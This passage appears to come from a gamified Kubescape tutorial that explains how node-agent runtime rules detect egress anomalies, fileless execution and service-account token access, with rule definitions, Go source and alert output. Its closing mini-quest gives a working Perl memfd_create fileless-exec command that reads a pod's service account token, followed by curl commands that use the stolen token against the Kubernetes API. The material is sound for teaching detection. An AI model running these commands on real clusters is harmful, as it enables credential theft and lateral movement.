  β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                   β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
           β”‚                                        β”‚
           β–Ό                                        β–Ό
  nn.is_domain_in_egress(                  nn.was_address_in_egress(
    event.containerId,                       event.containerId,
    event.name)                              event.dstAddr)
           β”‚                                        β”‚
           β–Ό                                        β–Ό
  Scans NN egress[].dnsNames              Scans NN egress[].ipAddress
  for "google.com."                       for "8.8.4.4"
           β”‚                                        β”‚
       NOT FOUND β†’ R0005 fires                  NOT FOUND β†’ R0011 fires

R0005 --- DNS Anomalies in Container

- name: "DNS Anomalies in container"
  id: "R0005"
  severity: 1
  expressions:
    ruleExpression:
      - eventType: "dns"
        expression: >-
          !event.name.endsWith('.svc.cluster.local.')
          && !nn.is_domain_in_egress(event.containerId, event.name)

R0011 --- Unexpected Egress Network Traffic

- name: "Unexpected Egress Network Traffic"
  id: "R0011"
  severity: 5
  expressions:
    ruleExpression:
      - eventType: "network"
        expression: >-
          event.pktType == 'OUTGOING'
          && !net.is_private_ip(event.dstAddr)
          && !nn.was_address_in_egress(event.containerId, event.dstAddr)

These two network rules taken together can protect against MITM, data exfiltration, command-and-control callbacks, and other malicious network activity. In the age of AI, it is recommended to verify all external endpoints that you send sensitive data to, also esp telemetry data.

Source code -- nn.wasAddressInEgress iterates egress entries

pkg/rulemanager/cel/libraries/networkneighborhood/network.go:13-39

func (l *nnLibrary) wasAddressInEgress(containerID, address ref.Val) ref.Val {
    container, err := profilehelper.GetContainerNetworkNeighborhood(
        l.objectCache, containerIDStr)
    if err != nil {
        return cache.NewProfileNotAvailableErr(...)
    }

    for _, egress := range container.Egress {
        if egress.IPAddress == addressStr {
            return types.Bool(true) // IP is allowlisted
        }
    }
    return types.Bool(false) // IP NOT in NN β†’ alert fires
}

nn.is_domain_in_egress works the same way but checks egress[].DNSNames and the deprecated egress[].DNS field:

func (l *nnLibrary) isDomainInEgress(containerID, domain ref.Val) ref.Val {
    container, err := profilehelper.GetContainerNetworkNeighborhood(
        l.objectCache, containerIDStr)
    if err != nil {
        return cache.NewProfileNotAvailableErr(...)
    }

    for _, egress := range container.Egress {
        if slices.Contains(egress.DNSNames, domainStr) || egress.DNS == domainStr {
            return types.Bool(true)
        }
    }
    return types.Bool(false)
}

The Inquisitor's job is often busy, tuning profiles and rules is recommended not overwork them. They are government employees, you know...

Work in Progress

Materials are coming soon

We're working hard to finish this content. Please consider upgrading your membership to help us complete it faster.

Support Development

Room 9 -- Herald's Tower & Quest Complete

Room 9: The Herald's Tower

At the top of the tallest tower, heralds stand at the battlements. When the bell tolls, a scroll flies up through a shaft. The first herald posts carriage returns πŸ“œ --- stdout. The second uses proper o11s πŸ¦‰ to AlertManager. The third dispatches a carrier pigeons as messenger via HTTP. The syslog accepts only kuneiform πŸ—Ώ. Within milliseconds, the defenders know.

  RuleManager                                         Exporters
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚                             β”‚                     β”‚                                          β”‚
  β”‚  exporter.SendRuleAlert(    β”‚                     β”‚  πŸ“œ stdout    ──>  kubectl logs          β”‚
  β”‚    ruleFailure              β”‚ ──────────────────> β”‚  πŸ¦‰ alertmgr  ──>  POST /api/v2/alerts   β”‚
  β”‚  )                          β”‚                     β”‚  πŸ•ŠοΈ http      ──>  webhook endpoint      β”‚
  β”‚                             β”‚                     β”‚  πŸ—Ώ syslog    ──>  syslog server         β”‚
  β”‚                             β”‚                     β”‚                                          β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

The Exporter ships the RuleFailure to one or more destinations. Stdout is the default (enabled via nodeAgent.stdoutExporter=true in Helm).

The Inquisitor's Court

Reading the Alert

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=50 | grep "R1005" | head -1 | python3 -m json.tool

Every alert answers six questions:

QuestionFieldOur R1005 Value
What happened?msgFileless execution detected
Who did it?cmdline/path"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token" memfd:pwned
Where?RuntimeK8sDetailsredis container, redis namespace
When?timestampnanosecond precision
Why suspicious?messageexec call 3 is from a malicious source
How bad?severity8 (MITRE T1055)

The Complete Journey

Fellowship Image

Event Trace: execve("/proc/self/fd/3")

#ComponentSource FileWhat Happens
1Kernel-execve("/proc/self/fd/3") syscall
2eBPF probetrace_exec gadgetCaptures exepath, pid, comm, args, timestamp
3ExecOperatortracers/execoperator.goParses null-terminated arg buffer
4eventOperatortracers/exec.go:109Wraps in DatasourceEvent, callback filter
5OrderedEventQueueordered_event_queue.goMin-heap insert, 50ms drain
6EventEnricherevent_enricher.go:28Process tree: redis-server β†’ perl β†’ cat(3)
7WorkerPoolcontainer_watcher.go:159Fan-out to handlers
8ProfileManagerevent_handler_factory.go:224Records exec (if still learning)
9RuleManagerrule_manager.go:216CEL evaluates R1005 expression
10CEL Enginerulemanager/cel/cel.go:178event.exepath.contains('memfd') β†’ true
11ExecAdapterruleadapters/adapters/exec.goSets PID, args, process tree on alert
12Exporterrule_manager.go:252SendRuleAlert() β†’ stdout / alertmgr

Four Rules That Fire

Our fileless exec triggers three different rules:

RuleSeverityCEL ExpressionWhy It Fires
R10058event.exepath.contains('memfd') || ...exepath = /proc/self/fd/3
R00011!ap.was_executed(containerID, path)perl not in exec profile
R00031syscall anomalymemfd_create not in syscall profile
R00061event.path.startsWith('/run/secrets/.../serviceaccount') && ...endsWith('/token'))
Repo Map
Mini-Quest The Stolen Token

The Golem's accomplice, a rogue script kiddie, has stolen a service account token. They attempt to use it for lateral movement, but the R0006 herald is waiting. The alert goes out, but alas, the K8s api has already been invoked R0007. The damage is done, but at least the defenders know how it happened and can respond accordingly.

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis -o jsonpath='{.items[0].metadata.name}')
kubectl -n redis exec "$REDIS_POD" -- perl -e '
use strict; use warnings;
my $name = "pwned";
my $fd = syscall(279, $name, 0);
if ($fd < 0) { $fd = syscall(319, $name, 0); }
die "memfd_create failed\n" if $fd < 0;
open(my $src, "<:raw", "/bin/cat") or die;
open(my $dst, ">&=", $fd) or die;
binmode $dst; my $buf;
while (read($src, $buf, 8192)) { print $dst $buf; }
close $src;
exec {"/proc/self/fd/$fd"} "cat",
  "/var/run/secrets/kubernetes.io/serviceaccount/token";
'

TOKEN=...

{"BaseRuntimeMetadata":{"alertName":"Unexpected service account token access","arguments":{"apChecksum":"4a47f71249d3fa76d990667495a566db2a7d72beb23949b764006c31d8c6a27a","flags":["O_RDONLY"],"message":"Unexpected access to service account token: /run/secrets/kubernetes.io/serviceaccount/..2026_03_17_21_20_33.1657460089/token with flags: O_RDONLY","path":"/run/secrets/kubernetes.io/serviceaccount/..2026_03_17_21_20_33.1657460089/token"},"infectedPID":816383,"severity":5,"timestamp":"2026-03-17T22:04:32.706127342Z","trace":{},"uniqueID":"d077f244def8a70e5ea758bd8352fcd8","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"cat"},"file":{"name":"token","directory":"/run/secrets/kubernetes.io/serviceaccount/..2026_03_17_21_20_33.1657460089"}},"agentVersion":"test-4bcd364"},"CloudMetadata":null,"RuleID":"R0006","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:69cdf2a6eda0be0a2238d20c03922f7fbf18e7274e49eda614fb41970ac6bff0","namespace":"redis","containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83","podName":"redis-54f999cb48-sfb5h","podNamespace":"redis","podUID":"64fea88a-44b4-4d12-b548-19397de5a7eb","workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"ff8ecf3a-2dc2-40ee-8234-06ac4aae6aa7"},"RuntimeProcessDetails":{"processTree":{"pid":816383,"cmdline":"/usr/bin/cat /var/run/secrets/kubernetes.io/serviceaccount/token","comm":"cat","ppid":12965,"pcomm":"runc","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/cat"},"containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83"},"level":"error","message":"Unexpected access to service account token: /run/secrets/kubernetes.io/serviceaccount/..2026_03_17_21_20_33.1657460089/token with flags: O_RDONLY","msg":"Unexpected service account token access","processtree_depth":"1","time":"2026-03-17T22:04:32Z"}
#export TOKEN=....
kubectl run curler -n redis --image=curlimages/curl --restart=Never  -- sleep 3600
kubectl -n redis exec -it curler -- sh -c \
  'TOKEN="put the value in quotes"; \
    curl -sk -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc/api/v1/namespaces/redis/pods | head -20'

Now, that you learnt how the rules work: what needs to be true for the R0007 alert to fire?


Hero, this ends your quest 🐼 πŸ‘‹πŸ»

Find the official Documentation at kubescape.io

There are community meetings on Zoom, every second Tuesday, at 15:00 CET and the Slack Channel

This is OpenSource software and this tutorial is licensed under the Apache 2.0 License. Without any liability or warranty of any kind, express or implied. Use at your own risk. For educational purposes only.

For more quests, star our repos and follow us on LinkedIn, Github and Twitter. We are always looking for brave adventurers to join our quest to secure the Kubernetes realm. If you have any questions or feedback, please reach out to us on GitHub or social media. Happy hunting!